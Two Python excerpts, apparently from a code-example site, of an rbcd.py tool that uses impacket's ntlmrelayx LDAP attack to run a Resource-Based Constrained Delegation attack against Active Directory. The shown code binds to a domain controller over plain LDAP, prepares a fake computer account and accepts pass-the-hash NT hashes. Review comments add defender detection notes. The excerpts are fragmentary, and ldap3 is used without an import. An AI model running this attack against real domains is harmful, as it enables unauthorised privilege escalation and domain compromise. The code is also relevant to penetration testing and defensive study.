Esempio n. 1
import ldapdomaindump
from impacket import logging
from impacket.examples import logger
from impacket.examples.ntlmrelayx.attacks.ldapattack import LDAPAttack
from impacket.examples.ntlmrelayx.utils.config import NTLMRelayxConfig

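# Operator-supplied placeholders. The account password is embedded in the
# script as a literal, so anyone who can read this file (or a copy of it in
# version control) can read the credential.
attackeraccount = ('DOMAIN\\USER', 'PASSWORD')
fakecomputer = 'FAKE_COMPUTER_NAME'
targetcomputer = 'TARGET_COMPUTER_NAME'
dc = 'DC_IP'

# Computer accounts carry a trailing '$' in their sAMAccountName.
targetsam = '{}$'.format(targetcomputer)
fakecomputersam = '{}$'.format(fakecomputer)

# ntlmrelayx configuration object carrying the computer-account name and the
# target host; presumably handed to LDAPAttack further down (not shown here).
# Defender note: an ordinary user can only add computer accounts while
# ms-DS-MachineAccountQuota is above 0, and a new computer account is
# recorded on the DC as Security event 4741.
c = NTLMRelayxConfig()
c.addcomputer = fakecomputer
c.target = dc

logger.init()
logging.getLogger().setLevel(logging.INFO)
logging.info('Starting Resource Based Constrained Delegation Attack against {}'.format(targetsam))

logging.info('Initializing LDAP connection to {}'.format(dc))
# The TLS setup below is disabled; as written it would also skip certificate
# validation (CERT_NONE).
#tls = ldap3.Tls(validate=ssl.CERT_NONE, version=ssl.PROTOCOL_TLSv1_2)
# NOTE(review): ldap3 is used here but is not among the imports visible in
# this excerpt; confirm it is imported elsewhere.
# No TLS object plus a SIMPLE bind means the account name and password cross
# the network unencrypted. Domain controllers that require LDAP signing
# refuse this kind of bind, and with LDAP interface diagnostics enabled they
# log it as Directory Service event 2889.
serv = ldap3.Server(dc, tls=False, get_info=ldap3.ALL)
# The password is masked in the log line on purpose.
logging.info('Using {} account with password ***'.format(attackeraccount[0]))
conn = ldap3.Connection(serv, user=attackeraccount[0], password=attackeraccount[1], authentication=ldap3.SIMPLE)
# bind() reports failure through its return value (exceptions are not enabled
# on this Connection), so check it instead of logging success unconditionally.
if not conn.bind():
    logging.error('LDAP bind failed: {}'.format(conn.result))
    raise SystemExit(1)
logging.info('LDAP bind OK')

logging.info('Initializing domainDumper()')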
Esempio n. 2
    help=
    'domain\\username:password, attacker account with write access to target computer properties (NetBIOS domain name must be used!)'
)

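# With no arguments at all, print usage plus a sample invocation and stop.
# Note that the sample passes the password on the command line, where it is
# visible in the process list and ends up in shell history.
if len(sys.argv) == 1:
    parser.print_help()
    print(
        '\nExample: ./rbcd.py -dc-ip 10.10.10.1 -t WEB -f FAKECOMP ECORP\\test:Spring2020'
    )
    sys.exit(1)

options = parser.parse_args()

# identity has the form 'domain\\username:password'. Split on the first ':'
# only, so a password that itself contains ':' is kept whole instead of being
# cut at its first colon.
attackeraccount = options.identity.split(':', 1)
c = NTLMRelayxConfig()
c.addcomputer = options.f
c.target = options.dc_ip

if options.hashes:
    # support only :NTHASH format (no LM): the LM half is always replaced by
    # the fixed empty-LM value. A bare NT hash without a leading ':' is
    # accepted too, instead of failing with an IndexError.
    hash_parts = options.hashes.split(":")
    nthash = hash_parts[1] if len(hash_parts) > 1 else hash_parts[0]
    attackerpassword = ("aad3b435b51404eeaad3b435b51404ee:" +
                        nthash).upper()
elif len(attackeraccount) == 2:
    attackerpassword = attackeraccount[1]
else:
    # No ':' in identity and no hashes supplied: report a usage error rather
    # than crashing with an IndexError on attackeraccount[1].
    parser.error(
        'identity must contain a password (domain\\username:password) '
        'when no hashes are supplied')

logger.init()
logging.getLogger().setLevel(logging.INFO)
logging.info(
    'Starting Resource Based Constrained Delegation Attack against {}$'.format(
        options.t))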